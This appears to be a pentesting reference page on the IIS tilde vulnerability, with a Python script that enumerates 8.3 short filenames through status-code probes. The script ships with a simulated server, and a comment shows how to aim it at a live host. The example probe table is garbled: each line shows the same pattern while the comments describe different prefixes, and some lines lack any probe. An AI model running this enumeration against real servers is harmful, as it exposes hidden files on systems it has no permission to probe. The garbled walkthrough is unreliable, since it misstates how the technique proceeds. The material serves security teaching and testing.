Microsoft IIS

Security-related information and use within the scope of pentesting


Internet Information Services (IIS) is an extensible web server created by Microsoft for the Windows NT family of operating systems (NT 3.1 through Windows Server 2016 at the time of writing). It speaks HTTP/1.1 and HTTP/2 (over TLS where configured) and also ships FTP/FTPS, SMTP and NNTP (Network News Transfer Protocol) services. IIS also implements several authentication mechanisms (e.g. HTTP Basic authentication, as well as Windows-integrated schemes such as NTLM and Kerberos) [1].

Tilde Vulnerability

The 8.3 or SFN (short filename) convention comes from MS-DOS/FAT: at most 8 characters for the name, a dot and at most 3 characters for the extension. When long filenames arrived (VFAT/NTFS), Windows kept generating an 8.3 alias for every long name so that legacy programs (e.g. 16-bit/MS-DOS software) can still open such files. Creating a file therefore also creates an SFN alias for it (list them with dir /x) following these rules:

example.txt => EXAMPLE.TXT (name <= 8 chars and extension <= 3 chars: only converted to uppercase, no separate alias needed)
if-filename-longer-than-8-chars.txt => IF-FIL~1.TXT (first 6 chars + "~" + a number that is incremented on collision; the extension is cut to 3 chars, e.g. web.config => WEB~1.CON)

Caveat: 8.3 name generation is an NTFS setting that can be disabled system-wide or per volume (check with fsutil 8dot3name query <volume>). Files created while it is disabled get no SFN, and existing aliases survive a later change of the setting unless they are explicitly stripped (fsutil 8dot3name strip), so the enumeration below only reveals files that had an SFN when they were created.

This can be combined with the way IIS answers a request whose path contains an 8.3 wildcard pattern: a normal existing file is answered with 200, a pattern that matches at least one short name in the directory is answered with 404, and a pattern that matches nothing is answered with 400, so the status code alone reveals whether a file with a given short-name prefix exists. Each probe has the form /<prefix>*~<n>*/.aspx, where * matches any run of characters, ? (URL-encoded as %3f) matches exactly one character, ~<n> is the SFN suffix and the trailing /.aspx suffix routes the probe to the ASP.NET handler. The status-code pair that separates a hit from a miss (404/400 here) depends on the IIS version and configuration, so calibrate it first with a pattern that is known to match nothing. Growing the prefix one character at a time then enumerates the short names of every file and folder in the web root. Example:

*~1*/.aspx                   =>  404: valid (one/more files available with SFN)
*~1*/.aspx                   =>  404: valid (starts with "A")
*~1*/.aspx                   =>  400: invalid (the second letter is not "A")
*~1*/.aspx                   =>  404: valid (the second letter is "C")
                             =>  400: invalid (it's not a folder and it has an extension)
                             =>  404: valid (extension has 3 or more chars; %3f = ? [URL-encoded])
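As an added example (not code from the original page or from the tools it names), the script below implements both halves of the technique described above in Python: an approximate 8.3 generator following the dir /x rules listed earlier, and a prefix-growing enumerator that issues probes of the form /<prefix>*~<n>*/.aspx, treating 404 as a hit and 400 as a miss. To run offline it includes a constructed FakeIIS class that answers probes the way the page describes; against a real host you would pass a probe callable that performs the HTTP request instead. The names FakeIIS, short_name, request_path, enumerate_short_names, ALPHABET and the sample web-root file list are this example's own assumptions.

```python
"""Tilde (8.3 short-name) enumeration, as an added example.

The enumerator only needs a probe(path) -> HTTP status code callable, so it
runs offline against the constructed FakeIIS below and, on an engagement,
against a real host with e.g.  probe = lambda p: requests.get(target + p).status_code
"""
import fnmatch
import re
from typing import Callable, Iterable, List, Set
from urllib.parse import unquote

# Characters tried at each position (8.3 names are upper-case and never contain spaces).
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"
BASE_LEN, EXT_LEN = 6, 3      # characters kept before "~N" / in the extension


def short_name(long_name: str, index: int = 1) -> str:
    """Approximate the 8.3 alias Windows generates for long_name (assumed rules:
    upper-case, drop characters illegal in 8.3, keep the name as-is if it already
    fits, otherwise first 6 chars + "~index" and the extension cut to 3 chars)."""
    base, dot, ext = long_name.rpartition(".")
    if not dot:                                   # no extension at all
        base, ext = long_name, ""
    clean_base = re.sub(r"[^A-Z0-9_\-]", "", base.upper())
    clean_ext = re.sub(r"[^A-Z0-9_\-]", "", ext.upper())
    fits = (clean_base == base.upper() and clean_ext == ext.upper()
            and 0 < len(clean_base) <= 8 and len(clean_ext) <= EXT_LEN)
    if not fits:
        clean_base = clean_base[:BASE_LEN] + "~" + str(index)
        clean_ext = clean_ext[:EXT_LEN]
    return clean_base + ("." + clean_ext if clean_ext else "")


def request_path(pattern: str) -> str:
    """Probe URL for a wildcard pattern: /<pattern>/.aspx with "?" encoded as %3f."""
    return "/" + pattern.replace("?", "%3f") + "/.aspx"


class FakeIIS:
    """Constructed stand-in for a vulnerable web root: 404 when at least one
    8.3 name matches the probed wildcard pattern, 400 when none does, and 200
    for anything that is not a tilde probe."""

    def __init__(self, long_names: Iterable[str]) -> None:
        self.short_names: Set[str] = set()
        for name in long_names:
            for index in range(1, 10):            # ~1, ~2, ... on collision
                sfn = short_name(name, index)
                if sfn not in self.short_names:
                    self.short_names.add(sfn)
                    break

    def probe(self, path: str) -> int:
        if not (path.startswith("/") and path.endswith("/.aspx")):
            return 200
        pattern = unquote(path[1:-len("/.aspx")]).upper()
        hit = any(fnmatch.fnmatchcase(sfn, pattern) for sfn in self.short_names)
        return 404 if hit else 400


def enumerate_short_names(probe: Callable[[str], int], max_index: int = 2) -> List[str]:
    """Recover 8.3 names by growing a prefix one character at a time, exactly
    like the manual sequence *~1*, A*~1*, AC*~1*, ... and then the extension."""
    found: List[str] = []

    def exists(pattern: str) -> bool:
        return probe(request_path(pattern)) == 404

    def walk_ext(name: str, ext: str) -> None:
        full = name + ("." + ext if ext else "")
        if exists(full):                          # exact match, no wildcard left
            found.append(full)
        if len(ext) < EXT_LEN:
            for c in ALPHABET:
                if exists(f"{name}.{ext}{c}*"):
                    walk_ext(name, ext + c)

    def walk_base(prefix: str, index: int) -> None:
        if prefix and exists(f"{prefix}~{index}*"):   # "~" follows: base part complete
            walk_ext(f"{prefix}~{index}", "")
        if len(prefix) < BASE_LEN:
            for c in ALPHABET:
                if exists(f"{prefix}{c}*~{index}*"):
                    walk_base(prefix + c, index)

    for index in range(1, max_index + 1):
        if exists(f"*~{index}*"):                 # any name with this suffix at all?
            walk_base("", index)
    return sorted(found)


if __name__ == "__main__":
    # Constructed sample web root; "example.txt" fits 8.3 and so has no "~" alias to find.
    root = FakeIIS(["web.config", "example.txt", "if-filename-longer-than-8-chars.txt",
                    "if-filename-longer-than-9-chars.txt"])
    for sfn in enumerate_short_names(root.probe):
        print(sfn)
```

Note that the enumerator only ever learns the short names (IF-FIL~1.TXT, WEB~1.CON); mapping them back to the full filenames still requires guessing, which is what the tools listed below attempt.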

Several tools automate the enumeration: IIS-ShortName-Scanner and tilde_enum (this script tries to go further).

Tool #1 (Java): IIS-ShortName-Scanner
Tool #2: tilde_enum